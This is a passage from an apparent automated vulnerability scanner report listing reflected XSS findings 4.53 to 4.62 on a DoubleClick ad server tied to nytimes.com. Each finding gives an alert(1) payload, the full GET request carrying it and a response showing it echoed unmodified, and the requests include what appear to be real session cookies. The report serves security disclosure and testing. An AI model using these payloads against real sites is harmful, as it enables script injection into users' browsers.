Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
8/3b05/7/128/%2a/d%3B240674684%3B0-0%3B0%3B63131103%3B4307-300/250%3B41996799/42014586/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotoa9ad8'-alert(1)-'abd4b72ba03&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be
...[SNIP]...

4.53. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.13

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c8cb"-alert(1)-"c06727afda5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto1c8cb"-alert(1)-"c06727afda5&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:13 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
8/3b05/7/128/%2a/d%3B240674684%3B0-0%3B0%3B63131103%3B4307-300/250%3B41996799/42014586/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto1c8cb"-alert(1)-"c06727afda5&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be
...[SNIP]...

4.54. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [ad parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a918'-alert(1)-'8a98d61d702 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x908a918'-alert(1)-'8a98d61d702&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
19%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x908a918'-alert(1)-'8a98d61d702&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?d
...[SNIP]...

4.55. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [ad parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3335a"-alert(1)-"d20d01cfbe4 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x903335a"-alert(1)-"d20d01cfbe4&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
19%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x903335a"-alert(1)-"d20d01cfbe4&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?d
...[SNIP]...

4.56. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [camp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 421d5"-alert(1)-"075af53bbdf was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2421d5"-alert(1)-"075af53bbdf&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2421d5"-alert(1)-"075af53bbdf&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvent
...[SNIP]...

4.57. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [camp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74793'-alert(1)-'ea56e5f634 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt274793'-alert(1)-'ea56e5f634&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6725

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt274793'-alert(1)-'ea56e5f634&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvent
...[SNIP]...

4.58. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3039'-alert(1)-'e3d745f63fd was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=a3039'-alert(1)-'e3d745f63fd HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=a3039'-alert(1)-'e3d745f63fdhttp://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;\">
...[SNIP]...

4.59. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0dd0"-alert(1)-"368571c22a3 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=a0dd0"-alert(1)-"368571c22a3 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=a0dd0"-alert(1)-"368571c22a3http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

4.60. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89feb'-alert(1)-'01cc9048b49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=&89feb'-alert(1)-'01cc9048b49=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6741

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=&89feb'-alert(1)-'01cc9048b49=1http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;\">
...[SNIP]...

4.61. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48d43"-alert(1)-"5168faf1b2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=&48d43"-alert(1)-"5168faf1b2a=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6741

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=&48d43"-alert(1)-"5168faf1b2a=1http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;");
var fscUrl = url;
var fscUrlClickTagFound = false;
v
...[SNIP]...

4.62. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [opzn&page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 996c3"-alert(1)-"92317d430a2 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook996c3"-alert(1)-"92317d430a2&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
